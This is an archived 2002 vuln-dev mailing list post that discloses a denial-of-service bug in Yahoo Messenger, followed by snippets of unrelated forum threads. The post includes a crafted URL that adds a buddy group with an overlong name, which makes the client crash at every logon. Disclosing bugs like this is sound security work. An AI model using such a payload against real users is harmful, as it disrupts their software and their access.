yahoo messenger DOS

From: adam lang (themeetup@hotmail.com)
Date: 02/26/02

From: "adam lang" <themeetup@hotmail.com>
To: vuln-dev@securityfocus.com
Date: Mon, 25 Feb 2002 23:42:15 +0000

When adding friends to your yahoo messenger you can click a link on their
profile. and it will put it in the friends group. The problem is with all
versions of yahoo messenger it cannot handle long group names. So if where
to visit.

http://edit.yahoo.com/config/set_buddygrp?.src=&.cmd=a&.bg=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&.bdl=YAHOONAME&.done=http%3a//profiles.yahoo.com/YAHOONAME

This would cause your yahoo messenger to crash by cauing an illegal
operation everytime you logon.

- GTH

  • Re: videoconferencing
    ... > friends over the internet. ... Friends are mostly using windows ... > version of Yahoo Messenger so must be compatible with the windows version ...
    (alt.os.linux.suse)
  • videoconferencing
    ... Looking for a webcam/program for conferencing. ... Friends are mostly using windows ... version of Yahoo Messenger so must be compatible with the windows version ...
    (alt.os.linux.suse)
  • Re: Yahoo and MSN Messenger
    ... you have to install Yahoo Messenger if you want to talk with them. ... communicate with one another or do they both have to be using the same ... I'm using the MSN Messenger that came with my PC and many of my friends ...
    (microsoft.public.windowsxp.messenger)
  • Cant Use Messenger with Firewall ON
    ... I tried using ZoneAlarm as well as ... Sygate Personal Firewall. ... yahoo messenger, but I can't receive any messages from my friends. ...
    (comp.security.firewalls)
  • Re: yahoo messenger
    ... Download & install the messenger again, which should work this time, run the ... messenger, close it, copy your profile again. ... I have yahoo messenger in my PC. ...
    (microsoft.public.windowsxp.general)